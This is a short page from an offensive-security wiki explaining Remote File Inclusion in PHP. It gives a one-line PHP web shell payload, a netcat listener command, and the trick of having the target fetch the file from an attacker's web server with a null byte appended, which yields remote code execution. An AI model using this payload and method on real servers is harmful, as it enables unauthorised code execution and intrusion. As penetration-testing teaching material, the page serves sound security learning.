> For the complete documentation index, see [llms.txt](https://www.hackbook.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.hackbook.io/web-application-hacking/web-techniques/file-and-resource-attacks/rfi.md).

# RFI

RFI is possible in PHP when the <mark style="color:orange;">allow\_url</mark>*<mark style="color:orange;">\_</mark>*<mark style="color:orange;">include</mark> directive is set to <mark style="color:orange;">On</mark> within **php.ini**.

### Host an evil file via HTTP (apache2/python/etc):

{% tabs %}
{% tab title="evil.txt" %}

```php
<?php echo shell_exec("cmd");?>
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
Set up a listener for debugging: <mark style="color:green;">nc -lvnp 80</mark>
{% endhint %}

Call the file:

![](/files/-McqpHORJXBpEyPOu6NN)

This goes to our web server and grabs the evil file. We see is that it requests\
GET /evil.txt.php\
from our webserver so we just add a null byte %00 to the end of it to stop it from appending the php.\
\
Then it works and since it will be read by the php engine we have RCE:

![](/files/-McqpJEghMT4m1BJuJY9)

{% hint style="info" %}
Txt is used because if we were to use a .php extension then the file would actually run on the attacker machine.&#x20;
{% endhint %}
